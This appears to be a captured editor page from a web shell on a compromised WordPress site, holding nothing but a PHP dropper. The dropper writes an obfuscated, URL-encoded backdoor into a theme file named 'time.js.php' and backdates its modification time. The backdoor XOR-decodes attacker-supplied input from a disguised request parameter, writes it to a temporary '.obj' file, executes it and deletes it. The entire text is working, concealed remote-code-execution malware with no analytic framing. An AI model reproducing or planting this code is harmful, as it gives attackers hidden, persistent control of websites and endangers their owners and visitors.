Edit: .bind
<?php $p = "/home/cmcgeorgia/public_html/wp-content/themes/twentytwenty/time.js.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28array_key_exists%28%22pro%5Cx70er%5Cx74%5Cx79_%5Cx73%5Cx65%5Cx74%22%2C%20%24_REQUEST%29%20%26%26%20%21is_null%28%24_REQUEST%5B%22pro%5Cx70er%5Cx74%5Cx79_%5Cx73%5Cx65%5Cx74%22%5D%29%29%7B%0A%09%24token%20%3D%20array_filter%28%5Bgetcwd%28%29%2C%20%22/tmp%22%2C%20session_save_path%28%29%2C%20%22/dev/shm%22%2C%20%22/var/tmp%22%2C%20getenv%28%22TMP%22%29%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20sys_get_temp_dir%28%29%2C%20getenv%28%22TEMP%22%29%5D%29%3B%0A%09%24sym%20%3D%20hex2bin%28%24_REQUEST%5B%22pro%5Cx70er%5Cx74%5Cx79_%5Cx73%5Cx65%5Cx74%22%5D%29%3B%0A%09%24ent%3D%20%27%27%3B%24b%20%3D%200%3B%20while%28%24b%20%3C%20strlen%28%24sym%29%29%7B%24ent%20.%3D%20chr%28ord%28%24sym%5B%24b%5D%29%20%5E%2038%29%3B%24b%2B%2B%3B%7D%0A%09%24itm%20%3D%200%3B%0Ado%20%7B%0A%20%20%20%20%24item%20%3D%20%24token%5B%24itm%5D%20%3F%3F%20null%3B%0A%20%20%20%20if%20%28%24itm%20%3E%3D%20count%28%24token%29%29%20break%3B%0A%20%20%20%20%09%09if%20%28%28is_dir%28%24item%29%20and%20is_writable%28%24item%29%29%29%20%7B%0A%20%20%20%20%24dchunk%20%3D%20vsprintf%28%22%25s/%25s%22%2C%20%5B%24item%2C%20%22.obj%22%5D%29%3B%0A%20%20%20%20%24success%20%3D%20file_put_contents%28%24dchunk%2C%20%24ent%29%3B%0Aif%20%28%24success%29%20%7B%0A%09include%20%24dchunk%3B%0A%09%40unlink%28%24dchunk%29%3B%0A%09die%28%29%3B%7D%0A%7D%0A%20%20%20%20%24itm%2B%2B%3B%0A%7D%20while%20%28true%29%3B%0A%7D'); if (file_put_contents($p, $c)) { echo '!success!'; @touch($p, 1768269115); } die('!ended!');
Cancel